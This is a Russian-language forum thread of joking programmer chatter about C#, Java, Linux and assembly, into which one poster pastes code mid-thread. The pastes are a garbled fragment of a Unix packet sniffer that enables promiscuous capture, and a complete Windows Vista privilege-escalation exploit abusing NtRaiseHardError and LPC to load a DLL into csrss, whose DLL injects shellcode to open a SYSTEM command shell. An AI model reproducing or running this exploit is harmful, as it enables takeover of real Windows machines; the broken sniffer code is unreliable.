Пусть развивают Колибри, делают совместимые программы и т.д. Шрифты пусть поменяют.

Max_Ventura, Макс, я что, их уговариваю? Это невозможно! А ты в курсе что 2 недели назад у одного из компашки сын родился? Ладно. Дело в том, что этот кретин только вчера пить перестал.

amentet, сын пить перестал? Молодец, на знал. Ну пусть заходит

Max_Ventura, он заходит, даже пост его есть, тестовый. Это я говорю *изпацтала* - сын родился и пить перестал , через 2 недели..))

ИМХО - Мерседес лучше.
ИМХО - C# лучше! Java вообще неудобная!

Чувствую себя как T90С на Франкфуртском автосалоне!

Кстати! Я начал осмысление того факта, что эта ОС на _ассемблере_ с открытым исходным кодом. Исходный код на ассемблере? Открытый? Респект!

Вопрос к профи: можно ли про ОС Windows сказать, что её исходный код на ассемблере открыт?

Yould_better_believe_me,Как ребенок, ей богу! ( нам, татараm, что е*ать ,что резать ) - в смысле пофиг - TASM,MASM или Lisp Yould_better_believe_me, Да года два, правда Сишный, но дело НЕ В ИСХОДНИКАХ, а в КОМПИЛЯТОРЕ.

Yould_better_believe_me,Либо ты про конвертеры кода не слышал ? НЕ ВЕРЮ! ( я дура и блондинка, в смысле => дура , IF блондинка ), спросил бы вчера, пока я не покрасилась!!!!

amentet, реально не врубаюсь. Объясните маленькому!
Значит всё-таки сишка, а не ассемблер.
Компилятор? Покруче Intel'эовского.

Что касается C# или Java. То разговор о том, что "всё равно на чём писать" я считаю дешёвым понтом. Например я спрашиваю коллегу, знает-ли он какую-нить хрень типа... мммммм... Ruby какой-нить, а он отвечает - "изучу если надо", то он как будто держит меня за идиота. Я что сам не могу изучить, блин?
Так боьшинство моих друзей пишут на VC6 и в частности используют сишные функции для работы с файлами (через FILE). Я противник таких вот "привычек" под настроение "всё равно на чём писать". Потому что VC++ 8 реально круче. И библиотеки качественнее и компилятор сильнее и среда удобнее.
Так что, какая разница на чём мы можем писать (читать хелпы все слава Богу умеем), а что реально лучше.

(пардон за флуд)

amentet, может и слышал, но оно мимо меня пролетело как-то. Судя по называнию это нечто конвертирующиее код. Это чё угодно может быть. (мне на ум только XSLT-процессор приходит)

Ты будешь патсталом хватаясь за живот, но я даже не знаю ОС Линукс. С детства никогда не придавался фанатическим нстроениям, поэтому "Линукс-рулеззз" де-факто не признаю. Ставил, смотрел... Вроде бы понтов меньше, чем в окошках, тормознее и медленнее. Так и не стал фигнёй страдать. (почти не стыдно)

Так что вернёмся к нашим баранам. Мне ведь с практической точки зрения интересно. Люблю себя ублажать и люблю "всё делать правильно". Скажем, C# - это рулеззз реальный. Мощно и притом очень удобно! Приятно очень. Есть идея закать себя футболку с рисунком: C# =)

Вот мои коллеги пытались сделать минимальную программу exe на C и ассемблере. Умялись вроде бы в 800 байт или около того. (PE-заголовок всё переписывали). И это типа крутизна невероятная. Из программы все библиотеки вырезаны. И какой толк от программы, которая ничего не делает (кроме как занимает 800 байт)? Это к вопросу об остром си с кофе...

Кстати: перекрашенная блондинка - это искусственный интеллект.

Извини за ликбез,за флуд не извиняюсь, ты про это?


#ifdef SUNOS4 /*--------< SUN OS4 >-----------*/

#define NIT_DEV "/dev/nit" */

#define DEFAULT_NIC "le0" */

#define CHUNKSIZE 4096 */

#endif



#ifdef LINUX /*--------< LINUX >-------------*/

#define NIT_DEV ""

#define DEFAULT_NIC "eth0" */

#define CHUNKSIZE 32000 */

#endif



#ifdef FREEBSD /*--------< FreeBSD >-----------*/

#define NIT_DEV "/dev/bpf" */

#define DEFAULT_NIC "ed0" */

#define CHUNKSIZE 32000 */

#endif



#ifdef IRIX /*-----------< IRIX >--------------*/

#define NIT_DEV ""

#define DEFAULT_NIC ""

#define CHUNKSIZE 60000 */

#define ETHERHDRPAD RAW_HDRPAD(sizeof(struct ether_header))

#endif



#ifdef SOLARIS /*--------< Solaris >-----------*/

#define NIT_DEV "/dev/hme" */

#define DEFAULT_NIC ""

#define CHUNKSIZE 32768 */

#endif



#define S_DEBUG */

#define SIZE_OF_ETHHDR 14 */

#define LOGFILE "./snif.log" */

#define TMPLOG_DIR "/tmp/" */



struct conn_list{

struct conn_list *next_p;

char sourceIP[16],destIP[16];

unsigned long sourcePort,destPort;

};



struct conn_list *cl; struct conn_list *org_cl;



#ifdef SOLARIS

int strgetmsg(fd, ctlp, flagsp, caller)

int fd;

struct strbuf *ctlp;

int *flagsp;

char *caller;

{

int rc;

static char errmsg[80];



*flagsp = 0;

if ((rc=getmsg(fd,ctlp,NULL,flagsp))<0) return(-2);

if (alarm(0)<0) return(-3);

if ((rc&(MORECTL|MOREDATA))==(MORECTL|MOREDATA)) return(-4);

if (rc&MORECTL) return(-5);

if (rc&MOREDATA) return(-6);

if (ctlp->lendl_primitive != DL_OK_ACK) return(-3);



pr.dl_primitive=DL_PROMISCON_REQ; pr.dl_level=DL_PROMISC_PHYS; c.maxlen = 0;

c.len=sizeof(dl_promiscon_req_t); c.buf=(char *)≺

if (putmsg(sock,&c,NULL,0)<0) return(-4);



c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlokack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_OK_ACK) return(-5);



bind_req.dl_primitive=DL_BIND_REQ; bind_req.dl_sap=0x800;

bind_req.dl_max_conind=0; bind_req.dl_service_mode=DL_CLDLS;

bind_req.dl_conn_mgmt=0; bind_req.dl_xidtest_flg=0; c.maxlen=0;

c.len=sizeof(dl_bind_req_t); c.buf=(char *)&bind_req;

if (putmsg(sock,&c,NULL,0)<0) return(-6);



c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlbindack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_BIND_ACK) return(-7);



si.ic_cmd=DLIOCRAW; si.ic_timout=-1; si.ic_len=0; si.ic_dp=NULL;

if (ioctl(sock, I_STR, &si)<0) return(-8);

if (ioctl(sock,I_FLUSH,FLUSHR)<0) return(-9);

#endif

return(sock);

}

спасибо за ликбез...
я так понимаю, ты у меня Access violation пыталась сделать =)
можешь пояснить?
1. я, конечно в языках не силён... но вроде бы должна быть функция main (если это c, конечно =) вроде похоже)
2. не нашёл среди define самой главной оськи! windows
3. не шарю в тонкостях, но LINUX - это что просто линукс??? У них там нет никаких различий?
4. непонятно, что это:
#ifdef SOLARIS

int strgetmsg(fd, ctlp, flagsp, caller)

int fd;

struct strbuf *ctlp;

int *flagsp;

char *caller;

{

как-то непосишному!

4. ну и, пожалуй, хватит... самое главное, что я точно знаю: return (sock); надо писать без скобок! return - это оператор, а не функция, хотя компилятор скобки пропускает...

Yould_better_believe_me, блин, это вообще макросы, директивы условной компиляции в зависимости от платформы - так что всё в поряде...

Yould_better_believe_me,ты не вьехал,понял сразу SilentCoder, а тебе, стритрейсер - "по сишному"Yould_better_believe_me, //exploit NtRaiseHardError privesc and load dll into csrss
//this version only is vista, other version can be worked
//with proper offsets, i will complete them soon
//imperfect but sometime work, ok for proto type;)
//dll limit to 8 chars but maybe can work around by
//\xxx\..\dll type trick and use LoadLibraryW, now is
//C:\TEST but another drive maybe work
#define offs1 0x30
#define offs2 0xBBD0
#include "windows.h"
#include "stdio.h"
DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD,
PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID,
PDWORD);
DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID,
DWORD,PDWORD);
DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*,
DWORD,PDWORD);
HANDLE hl;
HANDLE hs;
DWORD sb;
LPVOID lpc(LPCWSTR w){//cesar trick
WORD n[4];
SECURITY_QUALITY_OF_SERVICE q;
LPVOID p;
DWORD d;
DWORD c[6],s[3];
BYTE b[0x28];
n[0]=n[1]=wcslen(w)*2;
*(PDWORD)(n+2)=(DWORD)w;
memset(&q,0,sizeof(q));
q.Length=sizeof(q);
p=NULL;
d=0x1000;
memset(&c,0,sizeof(c));
c[0]=sizeof(c);
memset(&s,0,sizeof(s));
s[0]=sizeof(s);
memset(&b,0,sizeof(b));
b[1]=1;
hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL,
PAGE_READWRITE,0,d,NULL);
if(!hs)return NULL;
p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
if(!p)return NULL;
c[1]=(DWORD)hs;
c[3]=d;
c[4]=(DWORD)p;
d=sizeof(b);
if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d))
return NULL;
sb=c[5];
return p;
}

HANDLE e1,e11;
DWORD WINAPI tp1(LPVOID a){
LPVOID p[7];
DWORD d;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0x1B001AE;
p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus1";
while(1){
WaitForSingleObject(e1,INFINITE);
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e11);
}
return 0;
}

DWORD aaa,bbb;
HANDLE e2,e22;
DWORD WINAPI tp2(LPVOID a){
BYTE b[0xD8];
LPVOID p[7];
DWORD d;
memset(&b,0,sizeof(b));
*(PDWORD)(b+0x3C)=2;
*(PDWORD)(b+0x48)=1;
*(PDWORD)(b+0x4C)=1;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0xD600D6;
p[4]=&b;
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus2";
while(1){
WaitForSingleObject(e2,INFINITE);
memcpy(&b,"C:\\TEST",8);
*(PDWORD)(b+0x08)=aaa;
*(PDWORD)(b+0x0C)=bbb;
*(PDWORD)(b+0x70)=aaa+0x100;
*(PDWORD)(b+0x74)=aaa+0x100;
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e22);
}
return 0;
}

STARTUPINFO cps;
PROCESS_INFORMATION cpi;
void w(DWORD a,DWORD d){
HWND h;
aaa=d;
bbb=a;
SetEvent(e1);
do{h=FindWindow(NULL,"erasmus1");}while(!h);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
SetEvent(e2);
do{h=FindWindow(NULL,"erasmus2");}while(!h);
TerminateThread(cpi.hThread,0);
Sleep(100);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
}

int main(int c,char**v){
char sd[MAX_PATH];
char dp[MAX_PATH];
WCHAR pp[MAX_PATH];
WCHAR pn[MAX_PATH];
HMODULE nt,kr,ad;
DWORD se,cs,ws,u,d,h;
HANDLE t;
LPBYTE sc;
GetSystemDirectory(sd,sizeof(sd));
sprintf(dp,"%s\\csrsrv.dll",sd);
cs=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\winsrv.dll",sd);
ws=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\ntdll.dll",sd);
nt=LoadLibrary(dp);
sprintf(dp,"%s\\kernel32.dll",sd);
kr=LoadLibrary(dp);
sprintf(dp,"%s\\advapi32.dll",sd);
ad=LoadLibrary(dp);
*(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort");
*(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt,
"NtQueryInformationProcess");
*(LPVOID*)&NtRaiseHardError=GetProcAddress(nt,
"NtRaiseHardError");
if(2==c){
d=atoi(v[1]);
if(!d){
printf("no args need\n");
return -1;
}
t=OpenProcess(PROCESS_ALL_ACCESS,0,d);
if(!t){
printf("no args need\n");
return -1;
}
__asm mov eax,fs:[0x18]
__asm mov eax,[eax+0x30]
__asm mov eax,[eax+0x1D4]
__asm mov se,eax
if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se);
else swprintf(pp,L"\\Windows");
swprintf(pn,L"%s\\ApiPort",pp);
sc=(LPBYTE)lpc(pn);
swprintf(pn,L"%s\\SbApiPort",pp);
if(!sc)sc=(LPBYTE)lpc(pn);
if(!sc)return -1;
h=0;
DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2);
WriteProcessMemory(t,&hs,&h,4,&d);
WriteProcessMemory(t,&sb,&sb,4,&d);
Sleep(INFINITE);
}else{
STARTUPINFO cps;
PROCESS_INFORMATION cpi;
hs=sc=NULL;
sb=0;
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId());
if(!CreateProcess(NULL,sd,NULL,NULL,0,
CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps,
&cpi)){
printf("spawn fail\n");
return -1;
}
Sleep(3000);
if(!hs){
printf("lpc fail\n");
return -1;
}
sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
}
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
e1=CreateEvent(NULL,0,0,NULL);
e11=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp1,NULL,0,NULL);
e2=CreateEvent(NULL,0,0,NULL);
e22=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp2,NULL,0,NULL);
u=cs+offs2;
*(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA");
w(u,sb);
Sleep(INFINITE);
return 0;
}



//test.c
//26-12-2006 ]erasmus[/ORC
//dll for load in csrss by raise.c
//repair csrss and create OWNED.TXT and try create system cmd
//i can exec shell code in lpc shared section but LoadLibrary
//is for work around of DEP on vista
//also imperfect but also is proto type!
//offsets is for vista
#define offs1 0x5F89
#define offs2 0xBBD0
#define offs3 0xBBFC
#define offs4 0x3F0CC
#include "windows.h"
LONG WINAPI uef(LPEXCEPTION_POINTERS a){
Sleep(INFINITE);
return 0;
}

DWORD WINAPI tp(LPVOID a){
HMODULE kr,ws;
BYTE b[0x100];
DWORD c,d;
HANDLE h,t;
kr=GetModuleHandle("kernel32");
ws=GetModuleHandle("winsrv");
h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4));
c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),MEM_COMMIT,PAGE_EXE
CUTE_READWRITE);
d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69);
memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x
50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x
66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x
50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x
00\x00\x00\x00\x83\xC4\x58\xC3",73);
*(LPDWORD)(b+65)=d;
WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b),&d);
t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL
,0,NULL);
WaitForSingleObject(t,INFINITE);
return 0;
}

BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){
DWORD cs,d;
LPDWORD p,f,l;
HANDLE h;
if(DLL_PROCESS_ATTACH==dwReason){
SetUnhandledExceptionFilter(uef);
h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL,
CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL);
CloseHandle(h);
cs=(DWORD)GetModuleHandle("csrsrv");
*(LPDWORD)(cs+offs2)=0;
__asm mov eax,esp
__asm mov p,eax
while(1){
if(cs+offs1==*p){
*p=(DWORD)ExitThread;
d=p[1]+8;
break;
}
p=p+1;
}
p=*(LPDWORD*)(cs+offs3)+2;
f=p;
while(d!=f[0])f=*(LPDWORD*)f;
l=p;
while(d!=l[1])l=*(LPDWORD*)(l+1);
*(LPDWORD*)f=l;
*(LPDWORD*)(l+1)=f;
for(d=0;d<100;d=d+1){
p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8);
memset(p,0,0xD8);
p[2]=(DWORD)p+0x08;
p[3]=(DWORD)p+0x08;
p[4]=(DWORD)p+0x10;
p[5]=(DWORD)p+0x10;
p[13]=0x240000;
p[15]=1;
p[16]=1;
p[28]=(DWORD)p+0x78;
p[29]=(DWORD)p+0x80;
}
p=(LPDWORD)GetProcessHeap();
while(1){
p=p+1;
if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&&
!strcmp(*(LPSTR*)(p+1),"CSRSS")){
d=p[1]+6;
while(1){
p=p-1;
if(d-(DWORD)p==*p)break;
}
break;
}
}
*(LPDWORD*)(cs+offs2)=p;
Sleep(0);
CreateThread(NULL,0,tp,NULL,0,NULL);
}
return TRUE;
На этом позвольте более кодом не флудить. С уважением,
Рита.

интересные вещи происходят:
1. Я не понимаю, хотя обычно меня не помимают
2. я по моему знаю, что такое директивы условной компиляции (даже в шарпе их оставили!)ИМХО - внутри этих директив нарушение сиснтаксиса (VC++8 со мной согласен, изините, но GCC & Co не юзаю, апчхи)
3. Куда эти директивы засунуть? (говоря проще - на кой он мне?)
4. респект сайлент кодеру, за то, что углубился в эти дебри
5. (холодно тут у меня)... я люблю учиться, а не учить, поэтому ... amentet.QueryInterface(); вновь и вновь..
6. по поводу последнего (ну и гадость ваша заливная рыба). написано эксплойт для виста... блин у меня и висты то нет. К тому же... я люблю, а не ломать.
7. напиши на C# 3.0 - special for Alex

Очень приятно, Алексей.
(пришли ищё картинку mailto:dielamer@mail.ru)

C# 3.0
----------------------------
public class ExampleClass
{
public static void Main()
{
System.Console.WriteLine("special for Alex!");
}
}
Yould_better_believe_me,

Ваааааааааааааааауууууууууу)))))))

Я покорён!

Yould_better_believe_me, куда углубился? Какие дебри? За что респект? Мне эти дебри нах не нужны, я просто взглядом окинул беглым.

SilentCoder, я думал, раз Она тебя похвалила, значит ты понял, что делает этот код и вообще куда его засунуть

SilentCoder, Сай, у нас тут форум открылся.Кодерский)))) я точно пацталомYould_better_believe_me, сотворила вот:www.amentet.bb2.ru -для трепа , простого, а меня КОД преследует, с маньячной настойчивостью...((()))____(_|_)

amentet, я тут как-то искал сообщество пронерское на ли.ру.. так вот не нашёл такого. Давай сделаем маленького?

Yould_better_believe_me,
Маленького или маленькую? Или форум?

Yould_better_believe_me, кого получится! Нам же всё равно на чём прогить=)

Yould_better_believe_me, На СНЕГУ? Голым задом?

amentet, ты разносторонне развитая личность

Yould_better_believe_me,Нельзя быть "односторонней" , хотя, чем шире угол зрения - тем он тупее, приходится искать компромиссы, но в дюбом случае - не 45 градусов, я НЕ ПЬЮ!